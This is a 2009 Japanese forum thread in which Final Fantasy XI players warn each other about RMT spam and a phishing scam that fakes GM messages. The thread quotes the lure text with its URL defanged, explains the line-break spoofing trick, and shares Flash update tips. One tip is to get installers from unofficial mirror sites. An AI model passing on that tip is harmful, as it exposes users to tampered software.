http://tune.ache-bang.com/~vg/outitem/up/img/23611.jpg
141既にその名前は使われています:2009/08/07(金) 08:26:33 ID:jlyo6fp/
だうなー
142既にその名前は使われています:2009/08/07(金) 08:27:14 ID:57SkZ7mK
おはよう
スレタイの件でもう一つ、もしスレが途中で落ちたら、スレ番号は小数点にして欲しい
このスレだと51.5かな。そうしたら「いったん落ちた」てのが分かりやすいから
すこしは保守に気を付けてくれる人が増えるかも
143既にその名前は使われています:2009/08/07(金) 09:24:15 ID:RlAdHkoQ
どうでもいい
144既にその名前は使われています:2009/08/07(金) 11:40:43 ID:ziDOnQPj
完走できなくて建て直した前スレには、前のスレ番に小数点つけることはよくあるよ
このスレでも42が落ちたときに42.5で建ててる
145既にその名前は使われています:2009/08/07(金) 12:42:43 ID:jlyo6fp/
>>143
プレイヤーの数が如実に表してるね。
146既にその名前は使われています:2009/08/07(金) 13:57:06 ID:XtLhJ5g8
147既にその名前は使われています:2009/08/07(金) 15:11:24 ID:5SblYQLF
しゅ
148既にその名前は使われています:2009/08/07(金) 15:12:28 ID:jlyo6fp/
shi
hyuu
ma
149既にその名前は使われています:2009/08/07(金) 15:35:45 ID:NGRB2r3a
夏だなぁ
150既にその名前は使われています:2009/08/07(金) 16:20:38 ID:wXF25mVL
151既にその名前は使われています:2009/08/07(金) 16:57:30 ID:94F1LI71
不正アクセスにご注意ください
http://www.playonline.com/ff11/polnews/news16684.shtml
スクウェア・エニックス セキュリティトークンの導入以降、不正アクセスによるゲームデータの被害
は減少していますが、セキュリティトークンを未導入の方からの不正アクセスによる被害報告は現
在も寄せられております。
152既にその名前は使われています:2009/08/07(金) 17:58:40 ID:jlyo6fp/
>>151
ナンだ?またなんかあったのか?
帰省中にいつもと違う端末で〜ってケースが多いのかな?
153既にその名前は使われています:2009/08/07(金) 18:18:29 ID:jpyBkf7R
□e<トークン導入しろやゴラァ巻き戻し作業めんどくさいんでw
154既にその名前は使われています:2009/08/07(金) 18:45:13 ID:jlyo6fp/
>>153
商売のためかよw
155既にその名前は使われています:2009/08/07(金) 19:17:47 ID:MzBwHDdx
うちの鯖急激にデジョン2値下がってる
おまけに一人が複数出品してるが、またクエアイテムに力入れ始めたかね
156既にその名前は使われています:2009/08/07(金) 20:19:32 ID:9wyemdPW
復帰ついでにトークン買った
モグサッチェルよすぎwww
157既にその名前は使われています:2009/08/07(金) 22:00:41 ID:ieZsBME3
あげ
158既にその名前は使われています:2009/08/07(金) 23:49:00 ID:XtLhJ5g8
159既にその名前は使われています:2009/08/07(金) 23:58:30 ID:bl7QkdKK
俺が仕事さぼって必死にググった成果を貼っておく。
IE用flashplayer(10.0.32.18)がインストールできない場合の対処色々

・公式アンインストーラで古いバージョンを削除してみる。
→uninstall_flash_player.exeで調べれ。

・アップデートモジュール単体で更新してみる。
→最近のAdobe公式ダウンロードページは、一度ダウンロードプログラムが
起動する様子だが、このプログラムで失敗している事がある。
→モジュール単体の入手方法
正式:Adobeカスタマにユーザ登録する(登録したこと無いから不明)
非公式:外部の転載サイトから入手する。ウィルスチェックは厳重に。
(updatestar 10.0.32.18でググれ)
160既にその名前は使われています:2009/08/08(土) 00:00:33 ID:Zh8mqYbt
・flashplayer内蔵の自動更新機能で強制アップデートする。
→標準だと30日毎にIE起動した際に自動チェックされるが
これをIE起動時毎回チェックに変更してPC再起動
mms.cfg というファイルを作成し AutoUpdateInterval=0 と記述する。
詳しいやり方は↓でググれ
「長すぎるFlash Playerの自動更新間隔,“隠し設定”でカスタマイズを」

※説明通りにIEのみ再起動してもアップデートされない場合はPCを
再起動してみること。おそらくOS起動時にIEの実体が起動されている為。
自分の環境ではPC起動直後に何もしないのにアップデータが起動した。

>>135が困っているバージョンチェックでIEがCPU100%になる場合
mms.cfg に AutoUpdateDisable=1 を記述すれば回避できるかもしれない。
バージョンチェックページはアクセス拒否しておけば安心(かも?)
自分はGoogleChromeにしちゃってるから知らない。
161既にその名前は使われています:2009/08/08(土) 00:15:26 ID:2MWS4Zqp
sage信仰は危険なのレス
162既にその名前は使われています:2009/08/08(土) 01:07:56 ID:HxYFgc4e
>>159
仕事しれ
163既にその名前は使われています:2009/08/08(土) 01:27:24 ID:2bBL8K7V
ここまでくると、セキュリティのためのセキュリティだな
一部の、セキュリティおたくがオナニーレスしてるだけという
164既にその名前は使われています:2009/08/08(土) 01:49:44 ID:HO1LvPX5
人間は基本的に楽しくないことはやらないよ。
165既にその名前は使われています:2009/08/08(土) 02:36:29 ID:DXLmAl81
sine
166既にその名前は使われています:2009/08/08(土) 02:45:42 ID:JtjQeUk6
>>151
夏休み前の注意喚起かな?
企業だと長期休み(お盆・正月・GW)前に、MS Update だの、
サードパーティのソフト最新にしろだの、注意喚起の指示がでるし。

スクエニの注意事項に、加えて留意する点が1点。
サードパーティ(Adobe, Apple, Google, アーカイバ, etc)を最新状態に維持する事も
書くべきだと思うなー
167既にその名前は使われています:2009/08/08(土) 03:59:14 ID:wlAn/uhy
flasshu pureiyaaってアンインストーラーじゃないと削除できないのか
Secuniaさんが残党狩りしろと仰せになってやっと気づいた
168既にその名前は使われています:2009/08/08(土) 08:28:54 ID:eGRELoyP
249
169既にその名前は使われています:2009/08/08(土) 09:53:37 ID:q7tLOpI3
お出かけ前のage
170既にその名前は使われています:2009/08/08(土) 10:08:31 ID:CVH31aP7
他人に対してマネーゲームをけしかけるRMT>>163と比べれば、迷惑かかってないだけぜんぜんいいよ。
171既にその名前は使われています:2009/08/08(土) 11:02:04 ID:2bBL8K7V
図星突かれると煽りかよw 性質が悪いなw
172既にその名前は使われています:2009/08/08(土) 11:36:17 ID:q7tLOpI3
ただいまage
173既にその名前は使われています:2009/08/08(土) 13:43:31 ID:Y6ckmov2
NAの地図サイトなんだが踏んだらAvast先生に怒られた・・・やばいかな?

ttp://www.ffxi-atlas.com/
174既にその名前は使われています:2009/08/08(土) 13:46:34 ID:R9Jqwt+n
あとらすは広告に罠が入りやすい
175既にその名前は使われています:2009/08/08(土) 13:51:17 ID:YTO6caxx
>>173
ここはやばいか調べる場所じゃないんだぜ?

直リンしないようにするという配慮しろよage
176既にその名前は使われています:2009/08/08(土) 13:53:38 ID:DgDtjZrd
確か前スレでも報告した人いたけど
ウィルス名は教えてくれないんだよな
177既にその名前は使われています:2009/08/08(土) 14:15:42 ID:yHaM1S72
aguseのウェブ、ゲートウェイで調べたけどスルーしたよ
セーフブラウジングで調べたら 110■165■41■0がでてきた
178既にその名前は使われています:2009/08/08(土) 14:22:21 ID:TwQjdLVI
業者テルうるせー
179既にその名前は使われています:2009/08/08(土) 14:34:21 ID:kOZ+rfAA
広告何パターンかあって表示されるのが一定じゃないから
ffxi-atlasだけ貼っても調べようがないのぜ(総当たりで調べるのが面倒)
180既にその名前は使われています:2009/08/08(土) 16:49:46 ID:q7tLOpI3
age
181既にその名前は使われています:2009/08/08(土) 17:51:37 ID:SYS/AgP1
sage
182既にその名前は使われています:2009/08/08(土) 18:51:44 ID:q7tLOpI3
夕飯age
183既にその名前は使われています:2009/08/08(土) 19:25:06 ID:9qZou7CW
ie8.0プレーヤです
>>159-160の方法でなんとかsuinica先生がおとなしくなった
ありがとうございます
今度はShockwave Playerがバージョンアップしてくれない
アンインストールしてインストールしました
これも>>160のファイルをfrashディレクトリからShockwave10にコピーすればok?
それともend-of-lifeはやらなくてもok?
184既にその名前は使われています:2009/08/08(土) 19:27:12 ID:YTO6caxx
>>183
てか、しょっくうぇーぶ(笑)とかつかわないべ?

エンドオブライフは開発終了d
185既にその名前は使われています:2009/08/08(土) 19:27:39 ID:9qZou7CW
>>160の症状のとき
Flash10b●ocxというものが残った状態でした
186既にその名前は使われています:2009/08/08(土) 19:28:30 ID:9qZou7CW
>>184
わかりました
アンインストールしておきます
ありがとうございます
187既にその名前は使われています:2009/08/08(土) 19:48:03 ID:2MWS4Zqp
ウィルスではないけれど相変わらずJwordがいつの間にか
入って来てることがある上にプログラムメニューからの
アンインストールプログラムで削除出来なくて困る。

コントロールパネルの『プログラムと機能』で
アンインストールすれば消せるが本当に迷惑なんで止めて欲しい。
188既にその名前は使われています:2009/08/08(土) 19:50:29 ID:47TgywON
フリーソフトインスコするときに一緒に入れちゃってるんじゃね?
189既にその名前は使われています:2009/08/08(土) 21:16:42 ID:kOZ+rfAA
190既にその名前は使われています:2009/08/08(土) 21:16:53 ID:47TgywON
236
191既にその名前は使われています:2009/08/08(土) 21:36:47 ID:2MWS4Zqp
>>188
そうかな?ロジクールのマウスウェアとか青歯のドライバとか
最近入れたからそれかな〜と思ったけれど。
あ〜携帯マスターも入れたかな?

ともかく気が付いたら入っていたんだよな〜
192既にその名前は使われています:2009/08/08(土) 23:33:30 ID:vSJS4b5G
www.goldyeah.com の RMTtell が1分に2〜5回 くるんだが・・・
先週ぐらいにtellが連続で来るーってPTメンがいっていたが、この事だったのか…

キャラ名も次々とかわっていってblistaddしても意味が無いし
殺してやりたい・・・GMも対処しねーし・・・
193既にその名前は使われています:2009/08/08(土) 23:39:31 ID:DJRKI3le
フィルターくらいかけろよ
それつらいだろ
194既にその名前は使われています:2009/08/08(土) 23:45:40 ID:eGRELoyP
そしてage
195既にその名前は使われています:2009/08/09(日) 00:23:23 ID:UrHhiZKD
糞業者が5回もスパム送ってきやがる!ってNAもシャウトしてたわw
196既にその名前は使われています:2009/08/09(日) 02:08:57 ID:37nwqHnw
sage
197既にその名前は使われています:2009/08/09(日) 04:14:24 ID:QrZfNoaf
220からほしあげ
198既にその名前は使われています:2009/08/09(日) 05:45:24 ID:37nwqHnw
sine
199既にその名前は使われています:2009/08/09(日) 09:25:00 ID:6wcXKsBX
おはようあげ
200既にその名前は使われています:2009/08/09(日) 11:09:38 ID:ZV5KILsT
ございます
201既にその名前は使われています:2009/08/09(日) 11:29:16 ID:lETxzr39
>>192
登録者住所は中国遼寧省丹東市
中華の後発業者かの
202既にその名前は使われています:2009/08/09(日) 12:38:31 ID:ZV5KILsT
ひるめしあぐ
203既にその名前は使われています:2009/08/09(日) 13:54:34 ID:s2410sD8
一昨日から業者テルが短時間に何回もtell来るようになった
毎回文が微妙に違うからNGワード対策もしてるのかもな
204既にその名前は使われています:2009/08/09(日) 14:19:12 ID:bmyk8AGs
また活発化してるな
205既にその名前は使われています:2009/08/09(日) 16:09:01 ID:ucJzEqbI
age
206既にその名前は使われています:2009/08/09(日) 16:18:34 ID:aPmAdrxf
さっき業者からのtellが来たんだが、改行して
業者キャラ>>
GMなんちゃら>>

みたいにGMからのtellに偽装()笑させてて吹いた
207既にその名前は使われています:2009/08/09(日) 18:49:50 ID:MgqN6FuK
208既にその名前は使われています:2009/08/09(日) 20:02:17 ID:ucJzEqbI
209既にその名前は使われています:2009/08/09(日) 20:05:38 ID:2o3BIMhT
210既にその名前は使われています:2009/08/09(日) 20:06:43 ID:0PK0O4jw
211既にその名前は使われています:2009/08/09(日) 20:14:38 ID:7IOUCEYz
212既にその名前は使われています:2009/08/09(日) 20:46:44 ID:Lh4g1rWD
213既にその名前は使われています:2009/08/09(日) 20:48:31 ID:XSUafgqK

    .. ─⊆⊇- 、
    /∴        \
   /∴∵━━   ━━ ヽ
  |∴∵⊂■⊃  ⊂■⊃ |  <呼んだ?
  |∴::⊂⊃  ┏┓  ⊂⊃ |
 ┃∵∴..     ̄     .┃
 ┛ \∵∴        /.┗
     丶∵∴ _ ..... . ′
        ┃┃
      :::::::::┛┗
214既にその名前は使われています:2009/08/09(日) 20:49:52 ID:hdk/w7C4
【かえれ】
215既にその名前は使われています:2009/08/09(日) 21:07:29 ID:ucJzEqbI
>>207-214
予想とは違う展開になってるorz
216既にその名前は使われています:2009/08/09(日) 22:30:35 ID:qO/aBNch
みかん星人なつかしすぎるwww
217既にその名前は使われています:2009/08/09(日) 23:27:27 ID:ucJzEqbI
age
218既にその名前は使われています:2009/08/10(月) 00:20:01 ID:OmXOaP+a
生き残れ。
219既にその名前は使われています:2009/08/10(月) 00:35:02 ID:CCPtyxQv
生きのこれ。
220既にその名前は使われています:2009/08/10(月) 00:42:15 ID:wQZr4PBw
生き残れ マンダム
221既にその名前は使われています:2009/08/10(月) 01:30:50 ID:9Y0RjhJZ
生きのこ汁
222既にその名前は使われています:2009/08/10(月) 01:32:03 ID:9+zL4KLK

 チテン ポンポ
 てて テレレてれれテレテーっ 
 てーてーてー デンドンッ!!
223既にその名前は使われています:2009/08/10(月) 01:33:06 ID:iO5YG615
>>191
ソフトをインストールするときは内容をちゃんと確認してね
何も確認せずに「次へ」は危険だよ
224既にその名前は使われています:2009/08/10(月) 01:48:35 ID:CCPtyxQv
業者からあいかわらず無差別tell来たage
225既にその名前は使われています:2009/08/10(月) 03:04:51 ID:CITPRiI8
お休みのage
226既にその名前は使われています:2009/08/10(月) 03:49:00 ID:eaueamf8
下がるのはやいなー・・・トークンパワーか

まあ、業者撲滅までアゲ・・・でもGM働け・・・
227既にその名前は使われています:2009/08/10(月) 07:28:26 ID:OmXOaP+a
>>226
違います、諦めの境地ですよ^^
228既にその名前は使われています:2009/08/10(月) 10:15:48 ID:NL6gn9iw
      M
     (Θ∋
   ,,,,,;(( ゚Д゚)) <260カラage
  ,.;゙; (ノ."""';)
  `'ヾ;, ,.  , .;'
     '∪''∪

229既にその名前は使われています:2009/08/10(月) 10:43:02 ID:J/AFQzcm
自分の書き込みのコピペで悪いが。

956 名前: 既にその名前は使われています 投稿日: 2009/08/10(月) 10:41:58 ID:J/AFQzcm
おいお前ら、中華が新しいパス抜きサイト誘導してるから気をつけろ。
今Necromacってやつからテルが来て、内容というか表示としては以下のような感じになってる。

Necromac>> !
〜改行5行くらい略〜
  GM>> system will freeze your ID.if you have any questions,login http://ff11■sdo■ac/Complaint■html to make a complaint.

要するに中華がGMを名乗ってサイトに誘導して、パス入力させようとしてるって事だ。
下のアドレス内のドットは■に置き換えしてる。Aguseで見た所、英語のLSコミュっぽい内容だったが、罠サイトかどうかはわからない。
だが手口から見て罠サイトなのは間違い無いだろう。

気をつけろよ。
230既にその名前は使われています:2009/08/10(月) 10:47:30 ID:DXaAaUpZ
>>206のテルと同じ業者かね
231既にその名前は使われています:2009/08/10(月) 10:59:43 ID:J/AFQzcm
>>230
206を見てなかった。同じのようだ。
232既にその名前は使われています:2009/08/10(月) 11:54:04 ID:0wjvQjix
GM偽装tell注意喚起上げ。
233既にその名前は使われています:2009/08/10(月) 11:56:01 ID:CCPtyxQv
いい加減自分でNG設定できるフィルターを実装しろと
234既にその名前は使われています:2009/08/10(月) 12:19:46 ID:J/AFQzcm
ちなみに>>229はPC版での内容で、
PCで1行に入る文字数って凄い長いはずなのですが
これを5行近く使用して1つのチャット内容を送る事は出来るんでしょうか。

通常JPverで1回のチャットではPS2版では3行。PC版では1行を超える事が無いような。
235既にその名前は使われています:2009/08/10(月) 12:24:51 ID:OmXOaP+a
>>231
でもおかげでその情報の信頼度がググッと上がったでよ。

>>233
SageSundi>>アドバンテージを使ってください(キリッ
236既にその名前は使われています:2009/08/10(月) 12:28:21 ID:/eIj2qn0
βは確か改行用のタグがあって自演し放題だった
ちゃんと見れば区別はつくんだけどね
237既にその名前は使われています:2009/08/10(月) 12:30:25 ID:yblXfT/0
tell内でGM>>と書いてきたのか?
だったら、GMcallしたことある奴は引っかかりにくいだろうな
GM名まで偽装してたんなら、パターンがあるかも試練
238既にその名前は使われています:2009/08/10(月) 12:42:34 ID:CCPtyxQv
一日に何度も業者tell来るage
239既にその名前は使われています:2009/08/10(月) 12:44:07 ID:CCPtyxQv
送って30秒で自動返答age
240既にその名前は使われています:2009/08/10(月) 13:07:40 ID:CCPtyxQv
自動返答は早いが業者tellキャラ大絶賛放置中
241既にその名前は使われています:2009/08/10(月) 13:08:19 ID:J/AFQzcm
>>237
改行を使って、自分の名前とは別の行頭に
「 GM>>me」
と表示されるようにするやり方。

PS版だと2バイト文字で20個埋めると次の行になるから、
それを利用してGMからテルが来た物と勘違いさせようとしたんでしょうね。

どっちにしろ改行後じゃ行頭に空欄出来るからバレちゃうのですが。
242既にその名前は使われています:2009/08/10(月) 14:17:49 ID:d8EMBzNX
age
243既にその名前は使われています:2009/08/10(月) 15:07:23 ID:ccQ3E5RS
RMTサイトへの客引きだけならともかく、
GMを騙ってのパス抜きフィッシングサイトへの誘導となれば、一発でBANにできるんじゃないか?
もし自分宛にきたらGMに報告する価値はあるかもしれない。
244既にその名前は使われています:2009/08/10(月) 15:21:30 ID:DbBIJmbU
>>229
これはおもしろい。脆弱性を使うトロイの類は(たぶん)無く、
リンクシェルコミュニティを偽装して
ID・パスを入力させるフィッシングサイトですなぁ。
245既にその名前は使われています:2009/08/10(月) 17:06:13 ID:Cib8c3NU
ちょうど今、>>229と同じ内容のテルが来た
送信相手はLVL71ナ/踊
業者確定でいいの?
246既にその名前は使われています:2009/08/10(月) 17:24:04 ID:J/AFQzcm
>>245
取り敢えず改行チートとGM装い容疑で
GMコール
247既にその名前は使われています:2009/08/10(月) 17:32:58 ID:ccQ3E5RS
>>245
捨て垢じゃなくてLV71の垢からフィッシングサイトへの誘導?
なんだろ、ハックされたのかそれとも怪しいツールでも入れてBOT化されちゃったのか。
248既にその名前は使われています:2009/08/10(月) 18:51:20 ID:eKU/CVvE
上の>>229>>206ってこれ?まだ来たこと無いんだけど
http://ameblo.jp/eschata/entry-10318001196.html
249既にその名前は使われています:2009/08/10(月) 19:03:11 ID:RhwTs7Vj
フィッシング詐欺にご注意ください
http://www.playonline.com/ff11/polnews/news16691.shtml
250既にその名前は使われています:2009/08/10(月) 19:04:44 ID:CCPtyxQv
「ご注意ください」以前に既知の業者tellを取り締まれと。
251既にその名前は使われています:2009/08/10(月) 19:07:35 ID:uNd5QqCk
GMからのテルってさ
[GM]***** >>みたいな表示じゃなかったっけか
252既にその名前は使われています:2009/08/10(月) 19:11:10 ID:CCPtyxQv
[GM]Crokettin : みなさんと同じ普通のプレイヤーにしかみえません。

こんな感じじゃね?
253既にその名前は使われています:2009/08/10(月) 19:25:37 ID:HRf9Am/O
>>248
206だけどそれだな
俺の時は二回に分けて来たけど内容忘れちゃった
254既にその名前は使われています:2009/08/10(月) 19:35:52 ID:DXaAaUpZ
Ff14はPS3だけでやってくれりゃいいのに
PC組み入れると業者とツールで溢れかえるの繰り返し
255既にその名前は使われています:2009/08/10(月) 19:43:36 ID:8j8CmPX3
どっちにしろ業者はきえないだろ?
アイテム課金にしたら消えるぞ どうよ?
256既にその名前は使われています:2009/08/10(月) 20:00:38 ID:fP21/MjG
そもそも英語圏GMから日本人PCにtell来ること自体がおかしい
257既にその名前は使われています:2009/08/10(月) 20:50:08 ID:9Y0RjhJZ
258既にその名前は使われています:2009/08/10(月) 21:15:24 ID:u6muhRSP
>>256
MMOで強制混合鯖ってのは他にあるっけ、それが癌だよな〜
>>243
規約違反としては重くなるだろうけど、対処は今までと変わらないだろう
今日付けで、またフフィッシングサイトの注意喚起文を出したってことは(6月にも出してる)
その状況を■eは把握しているが、今すぐにどうこうできず
プレイヤーが注意するしかないと言うことだ

BANされたとしても、アカウント自体はFTでいくらでも作れるから
FTの廃止が一番効果的なんだけどな…
259既にその名前は使われています:2009/08/10(月) 21:24:40 ID:IS0/M9eo
>>254
ps3の普及率考えたら無謀www
260既にその名前は使われています:2009/08/10(月) 21:35:14 ID:OmXOaP+a
>>259
そうは言っても世界で2,300万台ですよ?
米900万、日本300万、その他1,000万台。
261既にその名前は使われています:2009/08/10(月) 21:36:18 ID:WV08EofM
そいつらが全部ネトゲやるやつとは限らない
262既にその名前は使われています:2009/08/10(月) 21:50:35 ID:OmXOaP+a
>>261
そう言われてもなぁ、ならパソコン持ちで今公開されているグラから
想定出来うるFF14クラスのネトゲやる層はどれだけ居るのかと。
263既にその名前は使われています:2009/08/10(月) 22:02:21 ID:DbBIJmbU
まぁNAやEUだとPC版の人のが多いだろうし
(ついでにNAはPS3より箱○のが多そうだし)
FF14が出る頃にはそこらのPCがあらかた
Win7(DirectX10.1か11)なスペックになっているかと。
# 私がFF11を始めた時のPCはGeForce3だったさ…。
264既にその名前は使われています:2009/08/10(月) 22:44:34 ID:mYMr7NHg
2300万人中の50万人がFF14プレイすればFF11並みにはなるんだから楽勝でしょ。
ほんの2%がプレイすればいい。
PS3自体これからもどんどん増えていくわけだし。

PC版切ってほしかったなぁ。
そうすりゃ解析も多少遅くなるだろうし、何よりチートがなくなる。
チートできなくなれば業者の活動も相当抑えられる。

PS2プレイヤーしかいなかった頃のFF11は、ほんと牧歌的な雰囲気で良かった。
265既にその名前は使われています:2009/08/10(月) 23:24:22 ID:DbBIJmbU
266既にその名前は使われています:2009/08/11(火) 00:02:44 ID:OmXOaP+a
>>264
上げ足取りでしかないが、し難くなるだけッすよー。
連射装置使うとかマクロコントローラー作っちゃうとかで
自動化出来る部分があればズル(チート)は出来る。
267既にその名前は使われています:2009/08/11(火) 00:38:25 ID:69/ZJ9J/
おやすみage
268既にその名前は使われています:2009/08/11(火) 02:03:51 ID:aHIMejOE
落ちるなage
269既にその名前は使われています:2009/08/11(火) 02:46:29 ID:OLhFlWjR
NoScript 1.9.8
270既にその名前は使われています:2009/08/11(火) 03:34:31 ID:4XQB2ulG
>>266
揚げ足取りでしかないが、CHEAT(改造)とBOT(自動操作)は意味違うだろー。
271既にその名前は使われています:2009/08/11(火) 05:36:23 ID:W6jJecwz
地震age
272既にその名前は使われています:2009/08/11(火) 07:51:57 ID:HetSkZhC
PS3でも改造できるんじゃね?Linuxとかで。
PCより難易度は高いが、見合うなるならやるだろ。
国別サーバは当然として、いっそ、RMTや高性能アイテムの交換が不可能なゲームデザインにすればいい。
裏、海、戦績アイテムみたいに。
会話が殆ど無い今のFF11は異常。
これは、異なる言語・文化を、営業都合でごった煮にしたせいじゃないか?
273既にその名前は使われています:2009/08/11(火) 08:08:15 ID:SSGzu71o
>>266
うん、それはそうだけどね。
でもマクロコントローラー程度じゃ、複雑なことできないから。
それと、地面の中移動したり、ワープしたり、本来のプログラムの想定外の動作は不可能だよね。

>>272
>PS3でも改造できるんじゃね?Linuxとかで。
それ言い出したら、なんでも可能になっちゃうわー(笑)
Windowsが動いてるPC版だと、スクリプト系の言語知ってるだけで外部プログラム作れて、
もともと複数プログラム同時に走らせる機能をOS自体が提供してるわけで、敷居はかなり低いから。
>PCより難易度は高いが、見合うなるならやるだろ。
というわけで相当難易度高いし、見合わないと思うよ。他にターゲットにできるPCオンラインゲームいっぱいあるし。
274既にその名前は使われています:2009/08/11(火) 08:16:04 ID:mNh2EpBc
>>264
PS2のグラで満足できるなんて、目が腐ってるんじゃね?
当時、スペック満たすPC買えなかったニートが、僻んでるようにしか見えねーわ
275既にその名前は使われています:2009/08/11(火) 08:34:45 ID:Uwc3jscu
中華のお仕事現場、酷過ぎワロス
ttp://www.new-akiba.com/archives/2006/03/rmt.html

>>274
D端子で繋げばPS2でもそこそこ綺麗だぜ
276既にその名前は使われています:2009/08/11(火) 10:38:34 ID:IK9SlgLb
グラ以前の問題多いからな
使いたい方使えばいいじゃないw
277既にその名前は使われています:2009/08/11(火) 10:47:01 ID:zNMoFGU+
初めてみる業者からテリガン放置キャラに30秒毎ぐらいにRMTTELLがきてるよなにこれ。
もう100ぐらい来てる・・・ GOLDYEAH.COMってところ
278既にその名前は使われています:2009/08/11(火) 11:31:49 ID:IWU/1V9C
PC版FF11が出た時の記事であったが、パイが多ければ多いほど課金者が増える余地が生まれるので
最大の稼働台数のPCを外すなんて事はしないそうだ。
クリエイターのこだわりwみたいなのを徹底する採算度外視社風なら家庭用ゲーム機だけ、言語鯖別もやるかも知れんが
今の■eじゃ無理な話だね。
279既にその名前は使われています:2009/08/11(火) 12:02:55 ID://1HtTuC
>>273
動画検出とか画像判断とか複雑な事すればズルは出来るんじゃないの?
マクロコントローラーは市販のモノではなくパソコンで代用すればいいサー。
280既にその名前は使われています:2009/08/11(火) 13:17:15 ID:69/ZJ9J/
age
281既にその名前は使われています:2009/08/11(火) 14:16:02 ID:NiybpEN2
まあ今更かもしれんが、RMTの元締めはろくな素性じゃない
ソースは→http://antikimchi.seesaa.net/article/125445685.html

運営団体名 株式会社 RMT
事務局郵便番号 〒106-0044
事務局所在地 東京都港区東麻布3-2-9
事業内容 オンラインゲーム通貨販売・買取サービス「GAME MART」の運営
http://www.gamemart.jp/credit/index.html
・勤務地 住所:東京都港区東麻布3-2-9 麻布ホーム201

株式会社アーシュ 
東京都港区東麻布3丁目2-9-201
http://phonebook.yahoo.co.jp/search/a13103/g3213000/

株式会社 ヒューマックス
〒106-0044 東京都港区東麻布3-2-9-201
【代表取締役】田中 純之
【取引先】鞄d通 株歯堂
http://www.humax-int.co.jp/menu04.html
282既にその名前は使われています:2009/08/11(火) 14:22:12 ID:BMAeb33l
■eの和田社長からして「RMTが一概に悪いとは言えない」とか何かの発表会で平気で言い放ってたことあったよな
トップがあれじゃそりゃ業者が消えるはずねーわと納得した
PS3でもWiiでも構わんがPCだけは来て欲しくなかったわ

283既にその名前は使われています:2009/08/11(火) 15:08:34 ID://1HtTuC
>>282
RMT云々は言葉遊び的なモンだと思うよ。
FF11に限らず追加シナリオ、追加要素、リアル&ゲーム連動商品、
バンナムのレベル売り、そう言ったモノひっくるめてRMTでしょ。

悪いRMTと良いRMTを分けて呼称出来れば
また違った表現方法が出来るんじゃないの?
284既にその名前は使われています:2009/08/11(火) 15:20:35 ID:rGr3n5bd
もうとっくに業者は14で24時間体制整えてる
ソースはあいつ
285既にその名前は使われています:2009/08/11(火) 15:37:48 ID:umbDHGq5
ソースチェッカーオンライン、今年中で閉鎖のお知らせage
286既にその名前は使われています:2009/08/11(火) 16:15:09 ID:wmjJM8I2
スパムtellでGM通報して、返信不要って書いてやってるのに定型文わざわざ送ってこないでよね・・・・
287既にその名前は使われています:2009/08/11(火) 16:52:08 ID:ztypf4P5
inする時に注意でるけど未だに引っかかる馬鹿がいるのか???
288既にその名前は使われています:2009/08/11(火) 16:53:43 ID:ztypf4P5
>>282
それは運営がガシャポンその他やるのもある意味RMTと同じって意味でしょ。
栽培金策とか単純にアカウントやキャラ増やしての金策も広義のRMTともいえるわけで。
289既にその名前は使われています:2009/08/11(火) 17:03:30 ID:0PJJ+uva
>>286
GMに日本語が読めるわけないだろ・・・
290既にその名前は使われています:2009/08/11(火) 17:08:08 ID:6dSnyyqz
>>286
返信したら裁判で戦うって一文いれとけよw
291既にその名前は使われています:2009/08/11(火) 17:42:10 ID:9AM8GqIU
>>289
日本語じゃ無くて、文字が見れないの間違いだろ。

そもそも「読まない」んだけどな。
292既にその名前は使われています:2009/08/11(火) 18:13:30 ID:Tu5EWGPe
>>258
単なるRMTサイトではなく、今回のはphishingサイトの形態をとっているから、ユーザーでもある程度追い込みを掛けることができる。
とりあえず、Firefox上からGoogleセーフブラウジングに偽装サイトとして報告を送ってみた。
293既にその名前は使われています:2009/08/11(火) 19:06:45 ID:g1xkL4YZ
phishingあげ
294既にその名前は使われています:2009/08/11(火) 19:42:47 ID:W6jJecwz
>>292
ああ、PhishTankは登録必要だからめんどくせーと思ったら
ブラウザの機能もありましたね。IE8のSmartScreenにも報告しときました。
295既にその名前は使われています:2009/08/11(火) 19:43:38 ID:oHO3/yzM
>>286
昼間に■eに電話入れるだけでも違うと思う
マジ切れしてるなら試してごらん
296既にその名前は使われています:2009/08/11(火) 20:59:34 ID:LUHwGIhy
hosiyu
297既にその名前は使われています:2009/08/11(火) 22:43:22 ID:io/v7w9D
298既にその名前は使われています:2009/08/11(火) 23:45:31 ID:+/08Cy62
どうでもいいネタスレが大量に立ってるせいで すぐに落ちるな

夏だなあ 支援上げ
299既にその名前は使われています:2009/08/11(火) 23:53:37 ID:vvNVzhM5
>>298
ホント・・・3桁レスないスレが、乱立しすぎよ。
300既にその名前は使われています:2009/08/12(水) 00:37:34 ID:O9oHpEL1
301既にその名前は使われています:2009/08/12(水) 00:38:40 ID:oghyGOcL
スパムtellのおかげでソロでいるときはひたすら離席状態にするようになったよ。
そのせいかフレともどんどん疎遠になって、今や固定コンテンツ以外で人と話す機会がない orz
302既にその名前は使われています:2009/08/12(水) 00:44:27 ID:6odIkAeb
栽培が潰れた今、業者って何して儲けてるんだろう。
昔みたいに一般プレイヤーに迷惑な事をしてくれなければいいが……
303既にその名前は使われています:2009/08/12(水) 01:18:33 ID:/Wn5GjLO
業者は蛆虫以下age
304ワルキューレ ◆mci....ll. :2009/08/12(水) 01:20:05 ID:x3kdnSap BE:63408454-2BP(3674)
数日前に久しぶりに復帰したら、ログイン直後にスパムtellきた。
モグハウスのanon倉庫にもきた。
305既にその名前は使われています:2009/08/12(水) 01:25:20 ID:TNpTDt7X
>301
それは自己責任だろww
306既にその名前は使われています:2009/08/12(水) 01:31:39 ID:XR07KyP3
>>301
ログインしたらとりあえず/sea all [鯖名の最初3文字] で検索し、それらしきヤツが三国にいたらブラックリストに
追加するのが俺の日課。
307既にその名前は使われています:2009/08/12(水) 02:53:30 ID:xI8CBVoi
支援上げ

308既にその名前は使われています:2009/08/12(水) 03:08:22 ID:EEV5AKx2
MicrosoftUpdate8月分キタコレ
309既にその名前は使われています:2009/08/12(水) 06:01:45 ID:5IBwLES6
NoScript1.9.8.1age
310既にその名前は使われています:2009/08/12(水) 08:19:35 ID:XneuCyw4
おはよう
311既にその名前は使われています:2009/08/12(水) 09:58:10 ID:uhsaBO2U
ごじゃります
312既にその名前は使われています:2009/08/12(水) 13:11:04 ID:EQ7o3F+F
こんにちは^^
313既にその名前は使われています:2009/08/12(水) 13:54:39 ID:f117rWpt
業者のRMTテルがウザいんだけど^^;と送ってもサポートデスクの反応ないな
garudaだけど鯖名の最初三文字だけじゃなく
ttp://tune.ache-bang.com/~vg/outitem/up/img/23663.jpg
こういう鯖と関係無い名前も出てきた
